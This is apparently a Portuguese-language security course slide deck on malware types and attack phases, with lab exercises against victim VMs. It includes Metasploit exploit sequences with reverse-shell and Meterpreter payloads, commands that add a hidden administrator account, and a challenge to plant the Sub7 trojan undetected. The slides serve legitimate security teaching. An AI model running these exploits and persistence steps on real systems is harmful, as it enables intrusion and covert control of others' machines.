Page 1

Laboratório Prático Segurança da Informação Prof. Alexandro Silva alexos@alexos.org

1


Sysadmin da Prodeb

Sysadmin do Projeto Gnome http://live.gnome.org/SysadminTeam ●

Consultor em Segurança da Informação e Tecnologias OpenSource ●

Prof. da PósGraduação em SegInfo na Faculdade Área1 e Unijorge ●

2


Apresentação Matéria Objetivo ●

Apresentar ao aluno os conceitos sobre como ocorrem os ataques e as formas de defesa.

3


Bibliografia McClure,Stuart Scambray,Joel and Kurtz,George - Hacking Exposed: Network Security Secrets & Solutions, 4th. Edition Graves, Kimberly – CEH Review Guide

4


Ciclo de um ataque c

Exploit: ● Programa criado para explorar um vulnerabilidade. Ex: Exploit-db ● Payload ou Shellcode: ● Programa malicioso que realiza ações num alvo comprometido. ●

5


Estudo sobre ameaรงas

6


Malware São programas especificamente desenvolvidos para executar ações danosas em um computador . Exemplos: ● Vírus ● Cavalos de tróia ● Backdoors ● Spywares ● Keylogger ● Worms ● Rootkits.

7


Vírus É um programa ou parte de um programa de computador, normalmente malicioso, que se propaga infectando, isto é, inserindo cópias de si mesmo e se tornando parte de outros programas e arquivos de um computador. O vírus depende da execução do programa ou arquivo hospedeiro para que possa se tornar ativo e dar continuidade ao processo de infecção. 8


Trojan Horse Programa, normalmente recebido como um "presente" (por exemplo, cartão virtual, álbum de fotos, protetor de tela, jogo, etc), que além de executar funções para as quais foi aparentemente projetado, também executa outras funções normalmente danosas e sem o conhecimento do usuário. Algumas das funções maliciosas que podem ser executadas por um cavalo de tróia são: ● Instalação de keyloggers ou screenloggers; ● Furto de senhas e outras informações sensíveis, como números de cartões de crédito; ● Inclusão de backdoors, para permitir que um atacante tenha total controle sobre o computador;

9


Backdoors Normalmente um atacante procura garantir uma forma de retornar a um computador comprometido, sem precisar recorrer aos métodos utilizados na realização da invasão. Na maioria dos casos, também é intenção do atacante poder retornar ao computador comprometido sem ser notado. ● A esses programas que permitem o retorno de um invasor a um computador comprometido, utilizando serviços criados ou modificados para este fim, dá-se o nome de backdoor. ●

10


Spyware Refere-se a uma categoria de software que tem o objetivo de monitorar atividades de um sistema e enviar as informações coletadas para terceiros. Atividades realizadas por esse tipo de malware: ● Monitoramento de URLs acessadas enquanto o usuário navega na Internet; ● Varredura dos arquivos armazenados no disco rígido do computador; monitoramento e captura de informações inseridas em outros programas, como IRC ou processadores de texto; 11


Keylogger É um programa capaz de capturar e armazenar as teclas digitadas pelo usuário. Dentre as informações capturadas podem estar o texto de um e-mail, dados digitados na declaração de Imposto de Renda e outras informações sensíveis, como senhas bancárias e números de cartões de crédito. 12


Worms Código capaz de propagar-se automaticamente através de redes, enviando cópias de si mesmo de computador para computador. Diferente do vírus, o worm não embute cópias de si mesmo em outros programas ou arquivos e não necessita ser explicitamente executado para se propagar. Sua propagação se dá através da exploração de vulnerabilidades existentes ou falhas na configuração de softwares instalados e computadores. Detectar a presença de um worm em um computador não é uma tarefa fácil. Muitas vezes os worms realizam uma série de atividades, incluindo sua propagação, sem que o usuário tenha conhecimento. 13


Rootkits O conjunto de programas que possibilitam a realização de ataques escondendo e assegurando a presença do invasor no computador Um rootkit pode fornecer programas com as mais diversas funcionalidades. Dentre eles, podemos citar: ● Programas para esconder atividades e informações deixadas pelo invasor, tais como arquivos, diretórios, processos, conexões de rede; ● Programas para remoção de evidências em arquivos de logs; 14


Risco = Vulnerabilidade * Ameaça –

Vulnerabildade: ●

Falha ou fraqueza que pode ser explorada ou não;

Ameaça: ●

Possibilidade de um agente explorar acidentalmente ou propositalmente uma vulnerabilidade específica.

15


Fases de um ataque 16


Fases de um ataque Fase 1 - Reconhecimento ●

Information Gathering;

Fingerprint;

Ferramentas e técnicas: –

Nmap;

DnsStuff;

Google;

Engenharia Social. 17


Scanning e Análise de Vulnerabilidade HandsOn ●

Port scanning com o Nmap –

Simples scan ●

nmap -sT <IP_REDE>

MS08_067 ( Conficker ) scan –

Nmap ●

nmap -PN -T4 -p139,445 -n -v --script smb-check-vulns,smb-os-discovery --script-args unsafe=1 [Alvo]

18


Fases de um ataque Fase 3 – Obtendo acesso ●

Está é a fase onde o invasor faz a invasão propriamente dita, após detectar e estudar as vulnerabilidades descobertas durante as fases anteriores é nesta fase que elas deverão ser exploradas obtendo assim o tão desejado acesso não autorizado. Os métodos de conexão usados pelo invasor pode ser dentro da própria LAN ( cabeada ou wireless ) da vitima, acesso local a uma máquina, a Internet, ou offline. –

Exemplos incluem buffer overflows, denial of service (DoS), e session hijacking.

19


Fases de um ataque Fase 3 – Obtendo acesso ●

Exemplos de ferramentas utilizadas durante esta fase: –

Metasploit Framework

Pirana

DNSspoof

Aircrack

SpoonWEP

John the ripper

20


Atacando Metasploit Framework ●

O MSF é uma ferramenta escrita em 2003 por HDMoore para o desenvolvimento e execução de exploits também possuindo ferramentas para antiforense.

21


Atacando Entendendo o MSF ●

O MSF possui os seguintes módulos: –

Auxiliary

Exploits

Payloads

Além dos módulos acima o MSF possui também Opcode, Encoders dentre outros recursos 22


Atacando Entendendo o MSF ●

Links –

http://www.metasploit.com/

http://searchsecurity.techtarget.com/news /article/0,289142,sid14_gci1135581,00. html

23


Atacando HandsOn ●

Infos: Atacante: ● Metasploit ● Netcat ● SubSeven – Vitima ● Windows XP SP2 Port. –

24


Atacando HandsOn ●

Ataque 1 – Remote VNC injection –

use exploit/windows/smb/ms08_067_netapi

set RHOST <IP_VITIMA>

set PAYLOAD windows/vncinject/reverse_tcp

set LHOST <SEU_IP>

exploit 25


– ●

Atacando HandsOn

Ataque 2 – IE “Operação Aurora” –

exploit/windows/browser/ms10_002_aurora

set RHOST <IP_VITIMA>

set PAYLOAD windows/meterpreter/reverse_tcp

set URIPATH /au

set LHOST <SEU_IP>

sessions -i 1 26


Atacando HandsOn ●

Ataque 4 – Remote Code Execution –

use exploit/windows/smb/ms06_040_netapi

set RHOST <IP_VITIMA>

set PAYLOAD windows/shell_bind_tcp

exploit

Depois de fechada a conexão digite: –

net user atacante alunopos /add

net localgroup administrators atacante /add

net localgroup administrators

27


Fases de um ataque Fase 4 – Mantendo o acesso ●

O objetivo de qualquer invasão é manter-se sempre a vitima pronta para um novo acesso para futura explorações e novos ataques. Em alguns momentos os invasores fortalecem os sistemas contra outros invasores permitindo acesso exclusivo, para isso eles utilizam de backdoors, rootkits e trojans. Uma vez que o invasor é dono do sistema,ele pode usá-lo como base para outros ataques. Neste caso o sistema invadido servirá como um zombie. 28


Fases de um ataque Fase 4 – Mantendo o acesso ●

Ferramentas usadas durante está fase: –

Privoxy

Netcat

29


Mantendo o acesso HandsOn

Desafio ●

Você detectou num host remoto várias vulnerabilidades, seus objetivos são: –

Obter acesso privilegiado;

Manter esse acesso sem que o usuário detecte sua presença.

Implantar o trojan horse Sub7

Usando as técnicas apresentadas realize este ataque. –

Ferramentas disponíveis: VM WinXP com ferramentas ● VM WinXP ( vitima ) ●

30


Fases de um ataque Fase 5 – Limpando o rastro ●

Após o invasor concretizar o ataque é hora de apagar os rastros evitando assim ser detectado pelo pessoal da segurança e contra problemas legais e também para manter o acesso constante ao sistema, também chamamos está técnica de anti-forense. Ações como remover arquivos de log ou alarmes de IDS. Exemplos de atividades realizadas durante está fase incluem o uso de steganografia, tunelamento de protocolos, e alteração de arquivos de log. 31


Mecanismos de Defesa

32


Técnicas de defesa ●

Para qualquer ambiente: –

Ter a atitude correta;

Usar ferramentas de proteção;

Manter seu sistema e aplicações atualizados.


Contatos ●

Site: http://alexos.org

Email: alexos@alexos.org

Twitter: @alexandrosilva

34

Hacker  

Ataque hacker

Read more
Read more
Similar to
Popular now
Just for you